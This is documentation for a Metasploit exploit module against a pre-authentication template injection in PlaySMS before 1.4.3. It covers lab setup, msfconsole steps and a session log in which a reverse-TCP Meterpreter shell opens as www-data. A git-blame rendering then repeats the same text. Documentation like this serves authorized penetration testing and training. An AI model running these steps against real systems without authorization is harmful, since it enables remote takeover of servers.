documentation/modules/exploit/multi/http/playsms_template_injection.md

## Vulnerable Application

### Description

This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom PHP template system called 'TPL' which is used in the PlaySMS template engine at `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a second time, results in code execution.

The TPL (https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.

### Setup

Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download).

 1. Download the application
 2. Extract : `tar -xvf playsms-1.4.2.tar.gz`
 3. Move in to the web directory : `mv playsms-1.4.2/web/* /var/www/html/`
 4. Make the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
 5. Change the owner : `chown -R www-data:www-data /var/www/html/`
 6. Set DB creds in the config.php file and dump playsms-1.4.2/db/playsms.sql in to your playsms database
 7. Now visit : http://localhost/

## Verification Steps

 1. Install the application (Tested on HactheBox Frolic Machine)
 2. Start msfconsole
 3. Do: `use exploit/multi/http/playsms_template_injection`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi /playsms`
 7. Do: `check`

```
[*] 10.10.10.111:9999 - The target appears to be vulnerable.
```

 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `run`
 13. You should get a shell.

## Scenarios

### Playsms on Ubuntu Linux

```
msf5 exploit(multi/http/playsms_template_injection) > options

Module options (exploit/multi/http/playsms_template_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base playsms directory path
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PlaySMS Before 1.4.3


msf5 exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(multi/http/playsms_template_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[+] X-CSRF-Token for login : c62b21bdb395dca92c18446217e31d7f
[*] Trying to Send Payload in Username Field ......
[+] Payload successfully sent
[*] Cookies here : PHPSESSID=p0jmmf1kpqfhpbpcgpbcfbhpv3;
[*] Sending stage (38288 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:51800) at 2020-04-02 17:30:53 -0500

meterpreter > getuid
Server username: www-data (1000)
meterpreter > sysinfo
Computer    : ec31d13f3520
OS          : Linux ec31d13f3520 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >
```
Move module to unix/webapp 2020-04-02 17:22:34 -05:00			`## Vulnerable Application`

			`### Description`

Grammatical changes for docs and status updates 2020-04-02 10:26:50 -05:00			This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom PHP template system called 'TPL' which is used in the PlaySMS template engine at `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a second time, results in code execution.
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30
Grammatical changes for docs and status updates 2020-04-02 10:26:50 -05:00			`The TPL (https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.`
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30
Move module to unix/webapp 2020-04-02 17:22:34 -05:00			`### Setup`
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30
Grammatical changes for docs and status updates 2020-04-02 10:26:50 -05:00			`Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download).`
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30
Grammatical changes for docs and status updates 2020-04-02 10:26:50 -05:00			`1. Download the application`
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30			2. Extract : `tar -xvf playsms-1.4.2.tar.gz`
Grammatical changes for docs and status updates 2020-04-02 10:26:50 -05:00			3. Move in to the web directory : `mv playsms-1.4.2/web/* /var/www/html/`
			4. Make the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
			5. Change the owner : `chown -R www-data:www-data /var/www/html/`
			`6. Set DB creds in the config.php file and dump playsms-1.4.2/db/playsms.sql in to your playsms database`
			`7. Now visit : http://localhost/`
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30
			`## Verification Steps`

			`1. Install the application (Tested on HactheBox Frolic Machine)`
			`2. Start msfconsole`
Cleanup more status methods and move the module 2020-04-03 09:51:24 -04:00			3. Do: `use exploit/multi/http/playsms_template_injection`
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30			4. Do: `set rport <port>`
			5. Do: `set rhost <ip>`
			6. Do: `set targeturi /playsms`
			7. Do: `check`
Move module to unix/webapp 2020-04-02 17:22:34 -05:00
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30			```
			`[*] 10.10.10.111:9999 - The target appears to be vulnerable.`
			```
Move module to unix/webapp 2020-04-02 17:22:34 -05:00
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30			10. Do: `set lport <port>`
			11. Do: `set lhost <ip>`
			12. Do: `run`
			`13. You should get a shell.`

			`## Scenarios`
Move module to unix/webapp 2020-04-02 17:22:34 -05:00
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30			`### Playsms on Ubuntu Linux`
Move module to unix/webapp 2020-04-02 17:22:34 -05:00
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30			```
Cleanup more status methods and move the module 2020-04-03 09:51:24 -04:00			`msf5 exploit(multi/http/playsms_template_injection) > options`
Don't delay the session and update module doc 2020-04-02 17:33:36 -05:00
Cleanup more status methods and move the module 2020-04-03 09:51:24 -04:00			`Module options (exploit/multi/http/playsms_template_injection):`
Don't delay the session and update module doc 2020-04-02 17:33:36 -05:00
			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'`
			`RPORT 80 yes The target port (TCP)`
			`SSL false no Negotiate SSL/TLS for outgoing connections`
			`TARGETURI / yes Base playsms directory path`
			`VHOST no HTTP server virtual host`


			`Payload options (php/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 PlaySMS Before 1.4.3`


Cleanup more status methods and move the module 2020-04-03 09:51:24 -04:00			`msf5 exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1`
Don't delay the session and update module doc 2020-04-02 17:33:36 -05:00			`rhosts => 127.0.0.1`
Cleanup more status methods and move the module 2020-04-03 09:51:24 -04:00			`msf5 exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3`
Don't delay the session and update module doc 2020-04-02 17:33:36 -05:00			`lhost => 192.168.1.3`
Cleanup more status methods and move the module 2020-04-03 09:51:24 -04:00			`msf5 exploit(multi/http/playsms_template_injection) > run`
Don't delay the session and update module doc 2020-04-02 17:33:36 -05:00
			`[*] Started reverse TCP handler on 192.168.1.3:4444`
			`[+] X-CSRF-Token for login : c62b21bdb395dca92c18446217e31d7f`
Playsms Preauth RCE 2020-03-12 18:17:34 +05:30			`[*] Trying to Send Payload in Username Field ......`
Don't delay the session and update module doc 2020-04-02 17:33:36 -05:00			`[+] Payload successfully sent`
			`[*] Cookies here : PHPSESSID=p0jmmf1kpqfhpbpcgpbcfbhpv3;`
			`[*] Sending stage (38288 bytes) to 192.168.1.3`
			`[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:51800) at 2020-04-02 17:30:53 -0500`

			`meterpreter > getuid`
			`Server username: www-data (1000)`
			`meterpreter > sysinfo`
			`Computer : ec31d13f3520`
			`OS : Linux ec31d13f3520 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64`
			`Meterpreter : php/linux`
			`meterpreter >`
Grammatical changes for docs and status updates 2020-04-02 10:26:50 -05:00			```